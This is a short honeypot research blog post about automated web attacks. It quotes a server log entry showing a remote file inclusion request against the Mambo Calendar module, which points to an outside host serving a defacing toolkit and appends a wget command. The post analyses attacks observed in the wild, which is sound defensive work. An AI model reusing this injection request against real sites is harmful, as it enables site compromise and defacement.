Defacing Tool 2.0 by r3v3ng4ns

Besides the compromises of the high-interaction honeypots, we see also quite a few automated attacks. In particular, I see quite a few scanning attempts for vulnerable web applications - phpMyAdmin and Mambo is clearly dominating. The Mambo attacks look like the following:
[Sun Aug 27 14:58:59 2006] [error] [client 195.86.124.210] File does not exist:
/XXX/htdocs/components, referer: http://XXX.128.12.35/components/com_calendar.php?
absolute_path=http://www.freewebtown.com/england90/tool25.gif?&cmd=wget

This is related to a vulnerability in the Calendar module of Mambo <= 1.5.7 which leads to the possibility of remote file inclusion, as seen in the request (http://www.freewebtown.com/england90/tool25.gif). tool25.gif itself is a defacing toolkit, the same as previously mentioned by the Philippine Honeynet Project and ISC. The attackers just use a different site to host the toolkit and the configuration file (therules25.gif - http://www.freewebtown.com/england90/therules25.gif).

I uploaded the files at http://honeyblog.org/junkyard/web-based/ in a sanitized form. If you want the complete files, just write me an e-mail (thorsten [dot] holz [at] gmail [dot] com).

Trackbacks

    No Trackbacks

Comments

Display comments as (Linear | Threaded)

    No comments


Add Comment


Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
E-Mail addresses will not be displayed and will only be used for E-Mail notifications

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA

 
Submitted comments will be subject to moderation before being displayed.